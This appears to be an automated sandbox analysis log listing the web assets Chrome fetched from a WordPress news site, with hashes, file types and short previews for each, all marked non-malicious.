                                                        URL:https://hardylive.com/wp-content/themes/jnews/style.css?ver=0b25e1
                                                        Preview:/*.Theme Name: JNews.Version: 11.6.6.Theme URI: http://themeforest.net.Description: JNews.Author: Jegtheme.Author URI: http://jegtheme.com/.License: GNU General Public License v2.0.License URI: http://www.gnu.org/licenses/gpl-2.0.html.Tags: custom-background,custom-colors, custom-menu, editor-style, featured-images, full-width-template, sticky-post, theme-options, threaded-comments, translation-ready.Text Domain: jnews.*/.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (422)
                                                        Category:downloaded
                                                        Size (bytes):457
                                                        Entropy (8bit):5.062678748736029
                                                        Encrypted:false
                                                        SSDEEP:12:Uz77mxDChzQiwBmGam7vp9PSu7QqBYAQ7:Q778Ch3wBmGH7vKM7ux
                                                        MD5:E4BC17CC45CA91AB0F09DEA134975C51
                                                        SHA1:3C03312717FB495C051D02A3D27EC0D8ABC2557D
                                                        SHA-256:5A43A22E48F94B7A45A9A9B1A107F197213B73307FDFA2E6B2DAADAB264F94D2
                                                        SHA-512:F8E537A2168B94875BB7DDB9A20037C5BC79831C8B4E726F224F8D7C723C5C4B4512551697CF7BFB6CE4B5F8365DC1C027107FFE3435EA27C686F5AE96D921E7
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://hardylive.com/wp-includes/js/dist/dom-ready.min.js?ver=f77871ff7694fffea381
                                                        Preview:/*! This file is auto-generated */.(()=>{"use strict";var e={d:(t,d)=>{for(var o in d)e.o(d,o)&&!e.o(t,o)&&Object.defineProperty(t,o,{enumerable:!0,get:d[o]})},o:(e,t)=>Object.prototype.hasOwnProperty.call(e,t)},t={};function d(e){"undefined"!=typeof document&&("complete"!==document.readyState&&"interactive"!==document.readyState?document.addEventListener("DOMContentLoaded",e):e())}e.d(t,{default:()=>d}),(window.wp=window.wp||{}).domReady=t.default})();
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (1572)
                                                        Category:downloaded
                                                        Size (bytes):118179
                                                        Entropy (8bit):5.360946147154213
                                                        Encrypted:false
                                                        SSDEEP:768:yF0FiFXFEFLBFNKFGFmFA5ngJLSNfrLLOMreL9NEgAmTFGjLEN9RxxoaR4LfNSGe:RQVyvcJuz6rs12vQJqP
                                                        MD5:197C586E3D989EEF70D1030D010F7035
                                                        SHA1:9FEF5F10E5814A35D081AA4E5221C1E0AEBA9E11
                                                        SHA-256:83A97033414EF0D0BF41F819757F7DE3FFB976D3EFD9B831C629A9DB3936603A
                                                        SHA-512:C56DFE8E595807B179CFB86C6449D37E6F96CB80A2F78197042B733608357CFCBB5237A5C2A54A1017F73F7D344370CF544459B4B52E1D3859F5D39611BEA5CC
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://fonts.googleapis.com/css?family=Roboto%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic%7CRoboto+Slab%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic&display=auto&ver=0b25e1
                                                        Preview:/* cyrillic-ext */.@font-face {. font-family: 'Roboto';. font-style: italic;. font-weight: 100;. font-stretch: 100%;. src: url(https://fonts.gstatic.com/s/roboto/v47/KFO5CnqEu92Fr1Mu53ZEC9_Vu3r1gIhOszmkC3kaWzU.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Roboto';. font-style: italic;. font-weight: 100;. font-stretch: 100%;. src: url(https://fonts.gstatic.com/s/roboto/v47/KFO5CnqEu92Fr1Mu53ZEC9_Vu3r1gIhOszmkAnkaWzU.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* greek-ext */.@font-face {. font-family: 'Roboto';. font-style: italic;. font-weight: 100;. font-stretch: 100%;. src: url(https://fonts.gstatic.com/s/roboto/v47/KFO5CnqEu92Fr1Mu53ZEC9_Vu3r1gIhOszmkCnkaWzU.woff2) format('woff2');. unicode-range: U+1F00-1FFF;.}./* greek */.@font-face {. font-family: 'Roboto';. font-style: italic;. font-weight: 100;.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=2400, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=2400], progressive, precision 8, 300x133, components 3
                                                        Category:dropped
                                                        Size (bytes):39096
                                                        Entropy (8bit):7.6288872003668855
                                                        Encrypted:false
                                                        SSDEEP:768:RA7pVbH/YyL1lbsM+yAlv+zetFpURfAjogn:R0VbH/tBt+SzqF8fAj5n
                                                        MD5:7B1B4AA551164A58848508979BAFC05D
                                                        SHA1:E0F49B0180A232609102E5676335206DE2DF486B
                                                        SHA-256:A770388E682A83B2115776D7451A916FBC2EFD9168C5063268E608C4B9AEA376
                                                        SHA-512:3C7105F92B8532CD689AA3F5EC8842306B9BF8AC40C5E22796153DFE5C5615DC29191CDBB89FD6489B7EC3B7711A8A75C86B9D5B780B1A6EB624D4132896B059
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:......Exif..MM.*...............`...........`...........................................................................(...........1.....$.....2..........i.............$.......-....'..-....'.Adobe Photoshop CC 2019 (Macintosh).2019:09:30 21:44:43...........0231.......................,...........................................r...........z.(.........................................H.......H..........Adobe_CM......Adobe.d................................................................................................................................................. .H.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...;z...t....s.|.v..k...?#w.aq.i._;#.........C....;%..v{Y...}?...^.....
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 1250x1042, components 3
                                                        Category:downloaded
                                                        Size (bytes):516887
                                                        Entropy (8bit):7.970962049107982
                                                        Encrypted:false
                                                        SSDEEP:12288:RbMRqo/hZNdj7Uo6a1qMN7mAQXqdLNW5mMVat1:yFezyQaNW5mMw
                                                        MD5:F8BD5150F7556FB20116B4F2094E61AF
                                                        SHA1:D83319B794BC649336DDDCEB61B33A3AD77467A8
                                                        SHA-256:8731AA96EC8AA1EEFA6A3331DEA9207D30D79DFB70B0E71A83DD635190AECC7D
                                                        SHA-512:078DA7409D823F35E52C82B478F29E3FC3ECE4DB2A7096099061918D7B02100A43DA1F8A76169039B308CE7963B6E82E5144E571128D83140D2EFACBA091C096
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://storage.googleapis.com/stateless-mountainmedianews-co/sites/35/2022/03/PCB-Ad-300x250Banner-Ad.jpg
                                                        Preview:......JFIF.....,.,.....,Photoshop 3.0.8BIM.........,.......,.........XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Refer
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:downloaded
                                                        Size (bytes):566
                                                        Entropy (8bit):4.390469303019164
                                                        Encrypted:false
                                                        SSDEEP:6:UInzBF1sHpNtAANC7ZRvcWQiy/0PaxJNtAAfvR7Jp0/4tSHuga5GobF/krNyNULN:UInzL1sHDQvkiQ0P+5J7goGINkqoN
                                                        MD5:30FBC3D2E03939CB944018510FD5D4C1
                                                        SHA1:65B6551EDE762468CA477B1A2CAD8E47988C1614
                                                        SHA-256:5BF97DE8AD6BC93B3C21DC853B405253B32668272E36F8624D209CE143681538
                                                        SHA-512:7B92B2092C19BA95D744BEC0A846EF2F325B2E5E73B829F84F870B1DC5C05F30CADAF4BAFA3C8E45EC7203E83CF213D87A68C934FD90A0E912E8A8B4A99CE313
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://hardylive.com/wp-content/themes/style.css?ver=1.0.0
                                                        Preview:/*..Theme Name: JNews - Child Theme..Version: 1.0.0..Theme URI: http://themeforest.net/?ref=jegtheme..Description: A basic starter child theme for customization purpose of JNews theme...Author: Jegtheme..Author URI: http://themeforest.net/user/jegtheme?ref=jegtheme..Template: jnews..License: GPLv2 or later..License URI: http://www.gnu.org/licenses/gpl-2.0.html..*/..../* ------------------------------------------------------------------------- *.. * Theme customization starts here../* ------------------------------------------------------------------------- */
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text
                                                        Category:downloaded
                                                        Size (bytes):254
                                                        Entropy (8bit):4.800907385401465
                                                        Encrypted:false
                                                        SSDEEP:6:UoCMZOYPwYs/KIrqEm5ps/KIrHmWes/KIrpjTR8cXs/KIrLmWE2Y33n:UoCMZOYoYsCIrOrsCIrvesCIrpjTjXse
                                                        MD5:A8F9311B2B4D95AB634DD8F26870F91B
                                                        SHA1:B5F5D839190FEBACDD836D8B61788FF74E5453A2
                                                        SHA-256:DB58CC870800A965BD2B098F8D947A54B79477A59E6A1AB8BDCB38D5FB488B34
                                                        SHA-512:D6B5E63154739DA851FB055AC1862ED491CFF552A40C5141D62AC40CB9F4BC08708E644DE0E0D5091E3528946FFC5D84CEF2226CE7524720E8F99881D0ED9CFD
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://hardylive.com/wp-content/plugins/elementor/assets/css/widget-image.min.css?ver=3.27.6
                                                        Preview:/*! elementor - v3.27.0 - 18-02-2025 */..elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=".svg"]{width:48px}.elementor-widget-image img{display:inline-block;vertical-align:middle}
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:Unicode text, UTF-8 text, with very long lines (7737)
                                                        Category:downloaded
                                                        Size (bytes):8375
                                                        Entropy (8bit):5.767603197477273
                                                        Encrypted:false
                                                        SSDEEP:192:QGxvVeLC4bvbI0Ny4jL4eaOldsF013mwYPHjibpb4QJoXqV3as:zxvVibjIQEeaOPy08wkH+lb5oo3as
                                                        MD5:2B235A134DEDA2C815A74C2A9CF674B0
                                                        SHA1:305B02357D6BD362760E49914F86811BDABAB58A
                                                        SHA-256:E93701F8A830CC185DB28B39E76F6C5D16E92B469D4BD0651E08F71AF473C1FE
                                                        SHA-512:ABF521DF5B4705AA1D7046E99273BBECE1B6AF378D2638EB0A9ECD97DDE2ABD1A9006ECE8F5ABC240AD3B7563624C516A6112057731AB3491E8E6772EA51775C
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://hardylive.com/wp-includes/js/dist/url.min.js?ver=e87eb76272a3a08402d2
                                                        Preview:/*! This file is auto-generated */.(()=>{var e={9681:e=>{var t={.:"A",.:"A",.:"A",.:"A",.:"A",.:"A",.:"A",.:"A",.:"A",.:"A",.:"A",.:"AE",.:"A",.:"A",.:"A",.:"A",.:"A",.:"A",.:"A",.:"A",.:"C",.:"C",.:"E",.:"E",.:"E",.:"E",.:"E",.:"E",.:"E",.:"E",.:"E",.:"E",.:"E",.:"E",.:"E",.:"E",.:"E",.:"E",.:"I",.:"I",.:"I",.:"I",.:"I",.:"I",.:"I",.:"I",.:"D",.:"N",.:"O",.:"O",.:"O",.:"O",.:"O",.:"O",.:"O",.:"O",.:"O",.:"O",.:"O",.:"O",.:"O",.:"O",.:"O",.:"O",.:"O",.:"O",.:"O",.:"O",.:"U",.:"U",.:"U",.:"U",.:"U",.:"U",.:"U",.:"U",.:"U",.:"Y",.:"a",.:"a",.:"a",.:"a",.:"a",.:"a",.:"a",.:"a",.:"a",.:"a",.:"a",.:"ae",.:"a",.:"a",.:"a",.:"a",.:"a",.:"a",.:"a",.:"a",.:"c",.:"c",.:"e",.:"e",.:"e",.:"e",.:"e",.:"e",.:"e",.:"e",.:"e",.:"e",.:"e",.:"e",.:"e",.:"e",.:"e",.:"e",.:"i",.:"i",.:"i",.:"i",.:"i",.:"i",.:"i",.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 82", baseline, precision 8, 750x536, components 3
                                                        Category:dropped
                                                        Size (bytes):155561
                                                        Entropy (8bit):7.975118384561663
                                                        Encrypted:false
                                                        SSDEEP:3072:1wFQTDQaYK6pOAX1Ot+RYvY73XRBtOL3g4Pn3j4U6i:ymQaYKO1Ot+RKY7HFObgC3tF
                                                        MD5:555A704936890BB6CEDC5C93AC83DA3D
                                                        SHA1:CB8F83117C71EC1E702F644536EC42607B7B8F55
                                                        SHA-256:B086AF4ACCE73CC510FCBE19EB25013E346E32BD255D190ECB78425E51438DE9
                                                        SHA-512:1FE820B1347C698E3C2859441B0DA157414440F8E66A46785EB8029E070C3CAD8C17263A28E89D5A70C0A9698D2EB4E302FD1B202740D16B13E1D8EBE1F8501B
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:......JFIF.....`.`.....;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 82....C.....................................!........'.."#%%%..),($+!$%$...C...........$...$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....(...(....c...]F....C.."Y.#...*...<7.\-...i..%..4`........kW1...E.:.....e...ZFa....,..Lc..h..>...4>..#.6...1.R9......,uX>.Y[^C..w.,....W6.9.....'f.R0T...(...~U..y#9..G.}..z...]..h2..'..bq.2.T..5..=6.[YZ[..:E.a.~...<7..9,....Y_...'.....>.....4e..|.*[..c'd....@...x....O......Vf.2...1..6...|.tS..wVf.{
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 250x60, components 3
                                                        Category:downloaded
                                                        Size (bytes):6251
                                                        Entropy (8bit):7.865256387308176
                                                        Encrypted:false
                                                        SSDEEP:96:zY925qC3LiR0ZtCG+8PteQfRzDkoNtTD0rr18LPLm824u918aW15+IMS:13+YCG+8TRzDztX0N8LTRdu09nT
                                                        MD5:EB182675E032C130AC091FC32FAFA400
                                                        SHA1:7E85C56F5B2EAA586171EC082B915217F76581BD
                                                        SHA-256:E34A7F2EEE9AE7CA27F6ADEF8B07614C99A2077D4DACDFB5DF40C43D9E5F1A29
                                                        SHA-512:65DBAE4A4478AC1DA37B202F936BD7C4A02DA263419EEBC6C8A1F7781911F6E403CE3B73390042628C35C4D743CEBAC91CB480752B9FD3B3E365C1186AFAD48B
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://storage.googleapis.com/stateless-mountainmedianews-co/sites/35/2024/10/mtmediabanner250.jpg
                                                        Preview:......Exif..II*.................Ducky.......<......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c001 79.c0204b2def, 2023/02/02-12:14:24 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:EBF1AE19CC4811EEA869DF20A924E424" xmpMM:InstanceID="xmp.iid:EBF1AE18CC4811EEA869DF20A924E424" xmp:CreatorTool="Adobe Photoshop 2023 Windows"> <xmpMM:DerivedFrom stRef:instanceID="C3F77B5A411575759BF56C95813E2416" stRef:documentID="C3F77B5A411575759BF56C95813E2416"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d..............................................................................................................................................
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:GIF image data, version 89a, 300 x 250
                                                        Category:dropped
                                                        Size (bytes):85643
                                                        Entropy (8bit):7.95535523162493
                                                        Encrypted:false
                                                        SSDEEP:1536:Y6i3hb0yW6nUtWSoyRLNmweJfVZDUANeiavObTvDV03FPHLri4+wJzGrhRM:Y9wy6doyRLNmdJtFTNUCvDV03J/EaIG
                                                        MD5:04E7BB2833064218B16B1A157E8E721C
                                                        SHA1:D17FF498EA299E92A038180C96E615CD7FE4DC4A
                                                        SHA-256:D38F38C9F9A568A0325D3ABC5B85B195A27E3A8DB53C1107BE430711D7688270
                                                        SHA-512:6C640ECAA81A03DD5E2C8D8D3657A33AD8354A2EB92CD833E806DFDFD569D27C4696DD6F9DB9560F5344A90FB2346112236DB4C71DAF02EB76ECB16740B3AF0D
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:GIF89a,.............{.pp.......N8NWFk.k..s.PCO..,........ZW.e.....4.U.....{.........elX{..{....eZ.-+6..jyc....Lc..9@.......*)2V.^.".......&..n.x.V....lQreQ1...........T..O)dz.../.....oR.u....so.GJ......mQUmlp.Sl...............@A............zt.ON.7\p.....s.E.a.hc..QQRs.Rk...#...........#,B8a...+.,......n:b.iS.gM3Gz.hL.&.Ci.cd....|.....f0U..{..s...)..............\exw.#............&.n....~MR.Z_h......k..iv;.....[..............J.xw./4z...5#.`1..Hs.....`.k.....z..q.@.{....ht.}........Cs..\`.X.I.H..l.Z....{.h....gW.....{.w....U...uk.m...|..7.....#.Z\.! N..hp.j..<?-Zm71~...jwJ.....w.[...k.\_.Z.k.....{.....s.....................|............................|...........s~...............p...x.]...~...L\.......!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.a1cd12f41, 2024/11/08-16:09:20 "> <rdf:RDF xmlns:rdf=
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:HTML document, ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):203
                                                        Entropy (8bit):5.139523437629011
                                                        Encrypted:false
                                                        SSDEEP:6:pn0+t9xqObRKr6TQzetSzRx3G0CezowoG:J0+t9xqeRKWTQzetSzRxGezn
                                                        MD5:A368EBDB8002FBB3142E16BC34B326D8
                                                        SHA1:E727C702FB6BE3CBEFA0B0847717B2334CE9B8FD
                                                        SHA-256:7BB4BE9184710E7D3067CE155A3F8E37C248BDF649906EA40AF66A324ACE61A4
                                                        SHA-512:2550B4B0040F566D106E24E8180DE41225FEDA5B82C68A31BC7DBCF422B6751CC1701CD3F1CC51A7FFDBD57FDCDCCABF1F3B6444AFDA681221F8E6F734C40DAD
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">..<html><head>..<title>404 Not Found</title>..</head><body>..<h1>Not Found</h1>..<p>The requested URL was not found on this server.</p>..</body></html>..
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (7969), with no line terminators
                                                        Category:downloaded
                                                        Size (bytes):7969
                                                        Entropy (8bit):5.282882132311395
                                                        Encrypted:false
                                                        SSDEEP:192:8Hs/avyVEEw+TxCBiVBUb6jRqJnonANYMvjqBWpuvOTU:8s/uyVlYiVBUxNYMv+muvOTU
                                                        MD5:91C4557B727DD3FC440C7B3EB10C7B9B
                                                        SHA1:7A7CCE17631943C19E49CA96BBC5C86841D4412B
                                                        SHA-256:F25BDDE84E2CC5770D7818E96B8F765517E30B540D2B3F615ABA454421936EFF
                                                        SHA-512:20B6B26AEDB0BDF873AB36982337F0BE08730A25CD502BDF42C189FC7A6E8EAFF972B2034207E08D8A3B6EFC450F2E52B8D32AC6B8ADD691DD3EB39E4EF0BE30
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://hardylive.com/wp-content/plugins/mailster/build/form/view.js?ver=70940c37d1c4b44da053
                                                        Preview:(()=>{"use strict";var e={n:t=>{var r=t&&t.__esModule?()=>t.default:()=>t;return e.d(r,{a:r}),r},d:(t,r)=>{for(var s in r)e.o(r,s)&&!e.o(t,s)&&Object.defineProperty(t,s,{enumerable:!0,get:r[s]})},o:(e,t)=>Object.prototype.hasOwnProperty.call(e,t)};const t=window.wp.apiFetch;var r=e.n(t);const s=window.wp.domReady;var o=e.n(s);!function(){const e=(e,t,r)=>{e.addEventListener(t,r)},t=(e,t,r)=>{e.removeEventListener(t,r)},s=(e,t)=>Array.prototype.slice.call(e.querySelectorAll(t)),a=(e,t)=>e.querySelector(t),i=window,l=i.document,n=i.setTimeout,c=i.clearTimeout,d=l.documentElement;let f=null;const u="click",m="mouseout",p="scroll",h="touchstart",v="mousedown",b="mousemove",g="keydown",y="keyup",k="keypress";function L(e){e.stopPropagation()}function w(e,t,r){let s;return()=>{let o=this,a=arguments,i=r&&!s;c(s),s=n((()=>{s=null,r||e.apply(o,a)}),t),i&&e.apply(o,a)}}function E(e,t,r){const s="mailster-form-"+e;if(void 0===r){const e=JSON.parse(i.localStorage.getItem(s));return t?e&&e[t]?e[t]
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 82", baseline, precision 8, 750x536, components 3
                                                        Category:dropped
                                                        Size (bytes):128561
                                                        Entropy (8bit):7.966580094902581
                                                        Encrypted:false
                                                        SSDEEP:3072:/yBd4Dp+NVNy+uVSX6ep1afWHp9zv1aEI0Vi/XNaHsRM:/eqDwy3SX6eSfWH7zvEAi/X4sK
                                                        MD5:CF63C75C45F637629EF4CF1CC70E9E66
                                                        SHA1:22C44331913C908D43605589E98CA477BD377BDE
                                                        SHA-256:713B550AEA902327066735B06B542E9F36A10FB04D1B09935FCEBBE5FC17C9D0
                                                        SHA-512:52E9E5366655BC74D2985D437041AFBEDF5CCD98B36BC8198D6E6248863843F16E46EB3CECA4BAC1EF02BB0022FC0A849BF50757CA8481C8B5C0FBA605175E27
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:......JFIF.....`.`.....;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 82....C.....................................!........'.."#%%%..),($+!$%$...C...........$...$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....(...(..WV.2.kt.l.<.%.1..H.H.FR......L..G'..\..J.l....4!.v.y...rH<.1.*[...O.=._m...'.&6.!`1.t.Q.....]-.?.s0.b2..r......}.=>...@.../...1..$.m`H#..0@...-!.M Z.M.t.;..VP...( .xP..g..J..z..;..i.yE.i....+.2..c8.....K.....?.~..=.J...I0.Vd.s.W..X...........1.E,A#;V/.....a.;..<c.kcY......%e..KU.0. .V..m..
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (5500)
                                                        Category:downloaded
                                                        Size (bytes):5535
                                                        Entropy (8bit):5.236525836342636
                                                        Encrypted:false
                                                        SSDEEP:96:NddsT+qa742fA66IBEaPgW6zEbBRf9u49sllMXT9aG7m6T7IAsHNkK9jzGfy85xr:ndc+dM2o6nBBP96zm+XlMXs6HQWZnBGm
                                                        MD5:A9BADB1BC96C97EC5E8646E8FA0EC3E9
                                                        SHA1:42E785C5382E0E61D5396C71900C31F639D6AFAD
                                                        SHA-256:A7F2681DEA38876A3DAB984AE6A0FEB07677B140868D6E7FBC70E6EE79A6919B
                                                        SHA-512:21FCA72E4FFB6E96AB9B0F112835055C952824158EDA6B32783F005CEE7C778224DBB232427E559A31047BD817CEE9BD4DE8F2B4B46BD7483C661C9EFA40EEFD
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://hardylive.com/wp-includes/js/dist/api-fetch.min.js?ver=d387b816bc1ed2042e28
                                                        Preview:/*! This file is auto-generated */.(()=>{"use strict";var e={d:(t,r)=>{for(var n in r)e.o(r,n)&&!e.o(t,n)&&Object.defineProperty(t,n,{enumerable:!0,get:r[n]})},o:(e,t)=>Object.prototype.hasOwnProperty.call(e,t)},t={};e.d(t,{default:()=>T});const r=window.wp.i18n;const n=function(e){const t=(e,r)=>{const{headers:n={}}=e;for(const o in n)if("x-wp-nonce"===o.toLowerCase()&&n[o]===t.nonce)return r(e);return r({...e,headers:{...n,"X-WP-Nonce":t.nonce}})};return t.nonce=e,t},o=(e,t)=>{let r,n,o=e.path;return"string"==typeof e.namespace&&"string"==typeof e.endpoint&&(r=e.namespace.replace(/^\/|\/$/g,""),n=e.endpoint.replace(/^\//,""),o=n?r+"/"+n:r),delete e.namespace,delete e.endpoint,t({...e,path:o})},a=e=>(t,r)=>o(t,(t=>{let n,o=t.url,a=t.path;return"string"==typeof a&&(n=e,-1!==e.indexOf("?")&&(a=a.replace("?","&")),a=a.replace(/^\//,""),"string"==typeof n&&-1!==n.indexOf("?")&&(a=a.replace("?","&")),o=n+a),r({...t,url:o})})),s=window.wp.url;function i(e,t){return Promise.resolve(t?e.body:
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 300 x 120, 8-bit/color RGB, non-interlaced
                                                        Category:downloaded
                                                        Size (bytes):64477
                                                        Entropy (8bit):7.090242474888688
                                                        Encrypted:false
                                                        SSDEEP:1536:6N6MB/RAuSoH03d3dclr9xPOnMwfW6FXuvxDbCSV+gheW1Ko5:I6I/FDHM3QzMWBd/VleW1Ko5
                                                        MD5:1C8F311DA53146CF8C9A8A58933F96F7
                                                        SHA1:1CD0098D8063B79F0B1D63F4C360ECD19F2D2B78
                                                        SHA-256:008517D7B601D77AAF549CF91272E78C7E828BFF0234CFB569B20D8495B348E9
                                                        SHA-512:93476E47D4BC01F8FD300AC235218A8F9F12293C159E38E42D752FAA22F769FA59495330A4B138A86F3532E9F777660543EF04FF72510D7D71D176CE558E649A
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://storage.googleapis.com/stateless-mountainmedianews-co/sites/35/2022/08/Pulmonary.png
                                                        Preview:.PNG........IHDR...,...x......wXw....pHYs...#...#.x.?v....iCCPPhotoshop ICC profile..x..]l.U....93k..U.-I...!.Y.(........n.-..D...c...........P.......D..D.Bn0....1.p..'$$.(........7.............I.f.P..Yk....B..XA7+*v.gJ."@..].]...#........Z1-...........A.O..!..l?..!..@..?1.....Z..@.T...t.....N..].LC.$.;..k.8.......rl.\.Z%.:........f...Z`e03......+..@.$N..(..$..9..[.]?....\..... 9XU..#...7...w...^.VA.[ojx.U{...&.u..[.CE..4....Zm.j.G"].:-sy...7g.{....y07._.<\..n.._..)...&.B9.....R......HK.d..]....`.+.P..j..{...i]..[.U.-.....j..|....S/Io.../QA.`.....,...b.hP.....C.....L!..A.0..%@RB.Z.......(.l.z>..E.?.........O...OC..i.M...Q.;.v.%...]"'._.h.b.Y...y.&..2..r........ X........%.p.f.+....[qGG..~M.._..W..N...>...W.....;..tV.....Y$..26..8.#_=..$N.xq.#U.xw../..)_..=......).g.R...G..w........y,.vV.F.N.D.2vV......-..Z.Ys....3.O.......b......}nq..{...m....b7 .038.U.x8.@.....q.V...[..}.{..!...y#gd..MF....cd:...#g.....=..^fR..!.@.?..Z=.....
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 82", baseline, precision 8, 750x536, components 3
                                                        Category:dropped
                                                        Size (bytes):144465
                                                        Entropy (8bit):7.976195874013586
                                                        Encrypted:false
                                                        SSDEEP:3072:ppIMmPI+UFRyXWU8OCCKEdNHDSRUNus9Voo5ZqgmzYUDvjJ2Mf5:ppbmPIGmaCCKKNgUss3VAUUUMf5
                                                        MD5:1EFDA67FDB00B1C8232EE7EE3F97750F
                                                        SHA1:2D81807E6B2E5731840A49D29436C808BAE0500E
                                                        SHA-256:A0B2C5D679DAC7421F3C18754EFE469ADD32E02B6E6ACCD0F21C269792FFBE99
